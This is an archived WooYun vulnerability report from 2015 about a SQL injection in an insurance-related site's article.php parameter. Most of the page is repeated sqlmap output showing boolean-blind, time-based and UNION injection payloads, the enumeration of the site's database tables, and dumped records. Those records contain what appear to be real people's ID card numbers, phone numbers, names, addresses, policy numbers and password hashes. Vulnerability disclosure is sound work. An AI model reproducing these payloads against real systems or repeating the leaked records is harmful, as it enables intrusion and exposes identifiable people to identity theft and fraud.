乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-19: 细节已通知厂商并且等待厂商处理中 2015-08-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-08-31: 细节向核心白帽子及相关领域专家公开 2015-09-10: 细节向普通白帽子公开 2015-09-20: 细节向实习白帽子公开 2015-10-05: 细节向公众公开
注入导致泄露资料包括姓名 身份证 户口类型 手机号 住址保单内容人险和车险
注入点
http://**.**.**.**/article.php?aid=42
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: aid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: aid=42 AND 2005=2005 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy) Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0.11available databases [2]:[*] information_schema[*] sq_lianb140728sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: aid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: aid=42 AND 2005=2005 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy) Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0.11No tables foundsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: aid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: aid=42 AND 2005=2005 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy) Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0.11Database: sq_lianb140728[11 tables]+--------------+| artical || artical2 || autoInfos || car_infos || cardtype || ins_info || insco || owner || salesman || servers || vchicle_type |+--------------+Database: sq_lianb140728+--------------+---------+| Table | Entries |+--------------+---------+| ins_info | 14700 || car_infos | 475 || autoInfos | 249 || vchicle_type | 61 || salesman | 51 || artical | 43 || artical2 | 43 || owner | 42 || cardtype | 18 || servers | 9 || insco | 6 |+--------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: aid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: aid=42 AND 2005=2005 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy) Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0.11Database: sq_lianb140728Table: ins_info[11 entries]+------------+--------------------+-------------+---------+---------+---------+-------------+---------+----------+------------+----------+----------+----------+----------------------------------+----------+---------------------+----------+----------+----------+----------+------------+-----------------+---------------------+------------+------------+-------------+| tou_idtype | tou_identity | tel | City | Area | email | mobile | linkman | address | enddate | bei_name | tou_name | relation | card_pwd | Province | lastdate | buy_time | smalljob | workunit | jobclass | startdate | card_code | activeTime | remarkDate | add_policy | card_status |+------------+--------------------+-------------+---------+---------+---------+-------------+---------+----------+------------+----------+----------+----------+----------------------------------+----------+---------------------+----------+----------+----------+----------+------------+-----------------+---------------------+------------+------------+-------------+| 身份证 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 0000-00-00 | <blank> | <blank> | <blank> | 50F0193098D2E9A616488C9E6BC78DEC | <blank> | 2017-01-01 00:00:00 | NULL | <blank> | - | NULL | 0000-00-00 | LB1501010000001 | 0000-00-00 00:00:00 | 0000-00-00 | <blank> | 0 || 身份证 | - | - | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 0000-00-00 | <blank> | - | <blank> | 16699F3EA4F18C455A67D4777198EA06 | <blank> | 2017-01-01 00:00:00 | NULL | <blank> | - | NULL | 0000-00-00 | LB1501010000002 | 0000-00-00 00:00:00 | 0000-00-00 | <blank> | 0 || 身份证 | 372833198002191916 | 18663506620 | 371500 | 371502 | <blank> | 18306588129 | 史银波 | 建设东路 | 2016-03-23 | 林令峰 | 林令峰 | 本人 | 9F2BF96AE39D50AFF8DE7D4D6ACA6580 | 370000 | 2017-01-01 00:00:00 | NULL | 农民 | - | NULL | 2015-03-24 | LB1501010000003 | 2015-03-23 09:02:53 | 0000-00-00 | <blank> | 2 || 身份证 | 372501196809168286 | 18663506620 | 371500 | 371502 | <blank> | 15206565468 | 史银波 | 建设东路 | 2016-03-23 | 庞其燕 | 庞其燕 | 本人 | 3EDA4E98F4730884A27A25A1A3CA84FF | 370000 | 2017-01-01 00:00:00 | NULL | 农民 | - | NULL | 2015-03-24 | LB1501010000004 | 2015-03-23 09:04:25 | 0000-00-00 | <blank> | 2 || 身份证 | 372501197001178267 | 18663506620 | 371500 | 371502 | <blank> | 15963179281 | 史银波 | 建设东路 | 2016-03-23 | 周胜芳 | 周胜芳 | 本人 | 1CB51DC2A201E7633C3770F23DE56DBC | 370000 | 2017-01-01 00:00:00 | NULL | 农民 | - | NULL | 2015-03-24 | LB1501010000005 | 2015-03-23 09:05:57 | 0000-00-00 | <blank> | 2 || 身份证 | 37252619750806504X | 18663538976 | 371500 | 371525 | <blank> | 15954565711 | 邹庆民 | 辛集乡后张官屯村 | 2016-04-07 | 李国 | 孔桂平 | 本人 | 8823F8EDE0286DFAAC506BC0760DA4E9 | 370000 | 2017-01-01 00:00:00 | NULL | 农民 | - | NULL | 2015-04-08 | LB1501010000006 | 2015-04-06 09:16:36 | 0000-00-00 | <blank> | 2 || 身份证 | 371502199111287514 | 13176957953 | 371500 | 371502 | <blank> | 13176957953 | 李秀云 | 建设东路 | 2016-05-13 | 吕路波 | 吕路波 | 本人 | B8E139B00FCF062E564AB6FB1F7D6EF2 | 370000 | 2017-01-01 00:00:00 | NULL | 农民 | - | NULL | 2015-05-14 | LB1501010000008 | 2015-05-11 17:08:22 | 0000-00-00 | <blank> | 2 || 身份证 | 372501197805098211 | 15275841618 | 371500 | 371502 | <blank> | 15275841618 | 李秀云 | 建设东路 | 2016-06-05 | 庞建勇 | 庞建勇 | 本人 | C107425B9DA98F023FFFDDD2D3D8D1E7 | 370000 | 2017-01-01 00:00:00 | NULL | 农民 | - | NULL | 2015-06-06 | LB1501010000009 | 2015-06-04 10:31:26 | 0000-00-00 | <blank> | 2 || 身份证 | 371502198905168221 | 18663538976 | 371500 | 371502 | <blank> | 18363565720 | 邹庆民 | 建设东路 | 2016-06-19 | 戴学丹 | 戴学丹 | 本人 | E77C4B37E306F74AB9B7457D893A96A2 | 370000 | 2017-01-01 00:00:00 | NULL | 农民 | - | NULL | 2015-06-20 | LB1501010000011 | 2015-06-18 15:45:05 | 0000-00-00 | <blank> | 2 |+------------+--------------------+-------------+---------+---------+---------+-------------+---------+----------+------------+----------+----------+----------+----------------------------------+----------+---------------------+----------+----------+----------+----------+------------+-----------------+---------------------+------------+------------+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: aid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: aid=42 AND 2005=2005 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: aid=42 AND (SELECT * FROM (SELECT(SLEEP(10)))crDy) Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: aid=-9624 UNION ALL SELECT CONCAT(0x7171716271,0x6a7a4a75764163625a71,0x7170767171)#---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0.11Database: sq_lianb140728Table: car_infos[5 entries]+-------+-------+---------+---------+--------------------+-------+-------------------------+---------+------------+---------+---------+-------------+----------------------------------+------------+-----------------+-------------+-------------+| co_id | sl_id | auto_id | card_id | tou_identity | yajin | policy | linkman | enddate | project | tou_tel | tou_name | card_pwd | startdate | card_code | card_status | linkman_tel |+-------+-------+---------+---------+--------------------+-------+-------------------------+---------+------------+---------+---------+-------------+----------------------------------+------------+-----------------+-------------+-------------+| 3 | 10 | 1 | 4 | 372526197009032710 | 000 | 23701009062004140000050 | 赵丽红 | 2015-11-17 | 驾驶员座 | <blank> | 申跃才 | 51711917CB29B654918737DFD3453FFF | 2014-11-18 | LB4600000400002 | 2 | <blank> || 3 | 14 | 2 | 4 | 31307866-9 | 000 | 23701009062004140000072 | 尹辉 | 2015-11-24 | 驾驶员座 | <blank> | 高唐县盛荣运输有限公司 | 4C468EA5F68700B35FD5D8013EFA8265 | 2014-11-25 | LB4600000400003 | 2 | <blank> || 3 | 14 | 2 | 4 | 31307866-9 | 000 | 23701009062004140000072 | 尹辉 | 2015-11-24 | 乘客座一 | <blank> | 高唐县盛荣运输有限公司 | D45CBDBACE059680E5AA11051609192B | 2014-11-25 | LB4600000400005 | 2 | <blank> || 3 | 14 | 2 | 4 | 31307866-9 | 000 | 23701009062004140000072 | 尹辉 | 2015-11-24 | 乘客座二 | <blank> | 高唐县盛荣运输有限公司 | A75B42126C12D7932264D9901C21E769 | 2014-11-25 | LB4600000400006 | 2 | <blank> || 3 | 0 | 3 | 4 | 05497857-3 | 000 | 23701009062004140000084 | 张明光 | 2015-12-03 | 驾驶员座 | <blank> | 聊城市金峰物流有限公司 | FC9BE6966296CFAD3346A0408F3A28EC | 2014-12-04 | LB4600000400043 | 2 | <blank> |+-------+-------+---------+---------+--------------------+-------+-------------------------+---------+------------+---------+---------+-------------+----------------------------------+------------+-----------------+-------------+-------------+
注入
危害等级:高
漏洞Rank:17
确认时间:2015-08-21 17:45
CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无
